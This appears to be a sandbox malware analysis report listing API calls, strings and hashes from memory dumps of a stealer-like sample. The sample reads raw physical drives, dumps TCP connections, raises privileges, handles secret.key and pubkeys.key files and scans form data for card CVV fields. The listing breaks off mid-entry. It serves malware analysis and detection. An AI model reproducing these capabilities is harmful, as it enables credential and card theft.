                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
                                                                                                                                                                                                            • String ID: %s%s$%s\%s$%s\*$.
                                                                                                                                                                                                            • API String ID: 2477558990-1591360731
                                                                                                                                                                                                            • Opcode ID: 576e1c5355d0aeacef1504503affc6409720645d3e22cd154972b019e9e49bb4
                                                                                                                                                                                                            • Instruction ID: b461757818bfddfe25a2474a52112285c5a7b3e154ad9055e720712d42659565
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 576e1c5355d0aeacef1504503affc6409720645d3e22cd154972b019e9e49bb4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F551B5B1604741AFD320DF54C888FEBBBE9FB85704F044A8DFA9597244E7749948CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocfree$exit
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 337157181-0
                                                                                                                                                                                                            • Opcode ID: d261e695fca6be96c204ac4bd0052be9edc10d39a0ae5c4d8e041d3f7c0048e4
                                                                                                                                                                                                            • Instruction ID: 7247ca8674091cf6db36704a8b00b6e6719b6b4cc981d7e33b820a8d1f2cbc19
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d261e695fca6be96c204ac4bd0052be9edc10d39a0ae5c4d8e041d3f7c0048e4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1F18AB5A002099BDB22CF58D884BFEB7B5FF88314F1445A9ED05AB350D7B1E951CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC3411
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(02C0DDB4,?,?,?), ref: 02BC3428
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(02C0DDB4,?,?,?), ref: 02BC3438
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BC3465
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02BC3487
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,76F89300), ref: 02BC34B1
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02BC34C0
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 02BC34D9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02BC34EA
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC3507
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC3518
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
                                                                                                                                                                                                            • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                            • API String ID: 649538874-3292898883
                                                                                                                                                                                                            • Opcode ID: e200d5c67c0da34d65dd9d7f49f7ac4c1373c32e83fcb50789fec451e430e0ee
                                                                                                                                                                                                            • Instruction ID: 4518520684267868edd14f9b80bf53e196f5528e4f79625e5a1aafec854a698c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e200d5c67c0da34d65dd9d7f49f7ac4c1373c32e83fcb50789fec451e430e0ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68310171A81214BBE7309B649C49FEE77ACDF01B14FA086C8F744AA0C0C7F05A908BE0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 02BDDB7A
                                                                                                                                                                                                            • strchr.MSVCRT ref: 02BDDB89
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 02BDDC75
                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 02BDDC89
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
                                                                                                                                                                                                            • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                            • API String ID: 23527507-2295261572
                                                                                                                                                                                                            • Opcode ID: 2349119abb691fe0ae602ba3ead7e79c21212c34da9570b97533c40d44adb318
                                                                                                                                                                                                            • Instruction ID: ad70e44f3b71b1e1a38c8676d30d7e725213cebfc9182873749972113acc08a1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2349119abb691fe0ae602ba3ead7e79c21212c34da9570b97533c40d44adb318
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5415A3390065B9FEF358B24CC547FA7BA1EB42308F1446E5DACA97180F771AA85CB51
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wsprintf$ComputerNamelstrlen
                                                                                                                                                                                                            • String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
                                                                                                                                                                                                            • API String ID: 776485234-1938657081
                                                                                                                                                                                                            • Opcode ID: 8537e32d2099706dc8fb7902dd17fac125557a9a38c56de017a22b1b97f80a40
                                                                                                                                                                                                            • Instruction ID: 1c3cd91a9b4a897188389313e66f7189deb2f6f95f478f78ef66d58910e212ba
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8537e32d2099706dc8fb7902dd17fac125557a9a38c56de017a22b1b97f80a40
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D012D7268021976B2B06F999C0BCBB3758CF8566574102D5FB87925F1EDD0AE0CCAB1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                            • CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                            • String ID: SeSecurityPrivilege
                                                                                                                                                                                                            • API String ID: 731831024-2333288578
                                                                                                                                                                                                            • Opcode ID: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                            • Instruction ID: 2f4dd94adce221d10feffccf969df1866f37505423b255349c6b180ac4db3a06
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92113CB6A00205ABE710DBE0DE0DFAF7B7CAB84B41F104129BB05F61D0D7749A04C7A9
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02BE1278
                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000000), ref: 02BE128E
                                                                                                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 02BE12A8
                                                                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 02BE12B3
                                                                                                                                                                                                            • bind.WS2_32(00000000,?,00000010), ref: 02BE12CB
                                                                                                                                                                                                            • listen.WS2_32(00000000,00000005), ref: 02BE12D8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: bindclosesockethtonslistensetsockoptsocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4126956815-0
                                                                                                                                                                                                            • Opcode ID: 7b8ec8a6cdc7389f4e40b4d05794fef32db1ea257d2baf20bd2406e59577d5be
                                                                                                                                                                                                            • Instruction ID: d5deee60bac56d2ce315931e52385060e862402b9a849b33671bf675a8a5858a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b8ec8a6cdc7389f4e40b4d05794fef32db1ea257d2baf20bd2406e59577d5be
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7011C231B50209ABDB209B68EC09FEF7778AF04751F504255FF05EB2C1EBB09A148BA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD2B5E
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02BD2B83
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02BD2B95
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileModuleNamememset
                                                                                                                                                                                                            • String ID: \clmain.exe
                                                                                                                                                                                                            • API String ID: 350293641-582869414
                                                                                                                                                                                                            • Opcode ID: b759224586c1d30eaa3b40a308f170ce40d7cdb5a6c36f1d36009d217b3a3228
                                                                                                                                                                                                            • Instruction ID: e88247927a0df6abc34c2f3d4caafb5f3efe1c37441550f56b9109ec78e29ed5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b759224586c1d30eaa3b40a308f170ce40d7cdb5a6c36f1d36009d217b3a3228
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8F0A7B1A842086BDBA4DA749C86BE573A89718B05F4006E5FB4EC60C0F7F016D88B91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02BDE119
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02BDE15E
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 02BDE1D2
                                                                                                                                                                                                            • free.MSVCRT(00000000), ref: 02BDE1FF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2496910992-0
                                                                                                                                                                                                            • Opcode ID: db358a6fb3f38fc74d91778b82577468dde699b863da09cdd41c1a5857a5e3d1
                                                                                                                                                                                                            • Instruction ID: c262819e331132623780e9ae66b8ffa9f7cc74b06a9afbe8a6b774b1ad754ced
                                                                                                                                                                                                            • Opcode Fuzzy Hash: db358a6fb3f38fc74d91778b82577468dde699b863da09cdd41c1a5857a5e3d1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F331497270025E8FDB10CEA8E8847EE7B64EB45351F1406E2EA458B201F731C656CBA2
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,76F93490), ref: 02BB419D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BB41A0
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB41B4
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB4224
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4232
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB4235
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4242
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB4245
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02BB425D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BB4260
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB4270
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB428A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4297
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB429A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB42AB
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB42AE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-000000A9), ref: 02BB42DA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BB42DD
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB42F4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02BB4346
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB434D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB435E
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB4365
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02BB439D
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02BB43B0
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB43C8
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB43DA
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB43DD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB43EA
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB43ED
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB43F9
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB43FC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB4409
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB440C
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(02BB58F7,00000000,00000000,00000001), ref: 02BB446E
                                                                                                                                                                                                            • LockFile.KERNEL32(02BB58F7,00000000,00000000,00000001,00000000), ref: 02BB447E
                                                                                                                                                                                                            • WriteFile.KERNEL32(02BB58F7,00000000,00000001,00000000,00000000), ref: 02BB448D
                                                                                                                                                                                                            • UnlockFile.KERNEL32(02BB58F7,02BB58F7,00000000,00000001,00000000), ref: 02BB449D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB44AC
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB44AF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB44BC
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB44BF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate$File$Allocmemset$Tablehtons$LockPointerUnlockWrite_snprintf
                                                                                                                                                                                                            • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                            • API String ID: 2439004899-2402783461
                                                                                                                                                                                                            • Opcode ID: 5f5ef55772b553a228ab7576bb457e016a8f12ea4f45d8c1d010d5c0f53379cc
                                                                                                                                                                                                            • Instruction ID: 22693621b77a3cfa7a040edd3b326cf8be284b6066337652e35d92e69e80c942
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f5ef55772b553a228ab7576bb457e016a8f12ea4f45d8c1d010d5c0f53379cc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEA1B0B1E40204ABDB619FA4AC5CFAF7F78EF85741F548598FA05AB241DBB09414CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD0830
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C97C), ref: 02BD0857
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD0895
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD089F
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD08A7
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD08B9
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD08C0
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BD08FC
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BD090A
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C97C,?,?), ref: 02BD0945
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD097F
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD0989
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD0991
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD09A0
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD09A7
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02BD09D5
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD0A00
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD0A4B
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,secret.key,00000104,?,?,?), ref: 02BD0A65
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD0AA8
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002,?,?,?), ref: 02BD0AC2
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,02BFA5BC,00000002,?,?,?), ref: 02BD0AE7
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD0B2A
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,pubkeys.key,00000104,?,secret.key,00000002,?,?,?), ref: 02BD0B44
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002,?,?,?), ref: 02BD0B69
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BD0BA1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02BD0BA4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BD0BB0
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?), ref: 02BD0BB3
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?,?,?), ref: 02BD0BC0
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD0BE6
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,?,?), ref: 02BD0C08
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},00000006,00000010,00000000,00000000,00000000,?), ref: 02BD0C23
                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?), ref: 02BD0C2E
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,?), ref: 02BD0C39
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?), ref: 02BD0C40
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,?,?), ref: 02BD0C50
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD0C62
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002,?,?,?), ref: 02BD0C8F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02BD0C92
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BD0C9F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?), ref: 02BD0CA2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002,?,?,?), ref: 02BD0CAB
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?), ref: 02BD0CAE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 02BD0CBF
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?), ref: 02BD0CC2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ErrorFreeLastPathSecuritymemset$CreateDescriptorDirectoryFileSleepValidatelstrcpyn$AdminAttributesBackslashFolderHandleMakeMutexSystemUser$CloseConvertCurrentDeleteInfoInformationLocalNamedReleaseSaclString
                                                                                                                                                                                                            • String ID: Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$S:(ML;;NRNWNX;;;LW)$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                            • API String ID: 1233543684-2787241867
                                                                                                                                                                                                            • Opcode ID: 8398757027ca5ef586260ada1c68fa2624c4c75ac0be94274b839a87a6efcfa1
                                                                                                                                                                                                            • Instruction ID: 36bf51d71861ff7cf7ff5a967bd0355aacfd5a82aa4294e23af7c989d0724e21
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8398757027ca5ef586260ada1c68fa2624c4c75ac0be94274b839a87a6efcfa1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04D10170944341AFE760AB74D888FAB7BE8EF89744F444E98F68587140EB74D518CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC89F2
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,02BC0BE3,?,?,?), ref: 02BC8A0F
                                                                                                                                                                                                              • Part of subcall function 02BC4170: GetProcessHeap.KERNEL32(00000008,02BC0BF7,02BC0BE3,?,02BC8A25,?,?,?), ref: 02BC4181
                                                                                                                                                                                                              • Part of subcall function 02BC4170: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 02BC4188
                                                                                                                                                                                                              • Part of subcall function 02BC4170: memset.MSVCRT ref: 02BC4198
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC8A35
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv=,00000000,76F8F380,00000000,00000001,00000000,?,?,?,02BC8A44,?,?,?,?,?), ref: 02BCE433
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE441
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE44D
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE45B
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE467
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE479
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: strstr.MSVCRT ref: 02BCE48F
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: strstr.MSVCRT ref: 02BCE4A2
                                                                                                                                                                                                              • Part of subcall function 02BCE3F0: GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02BCE50B
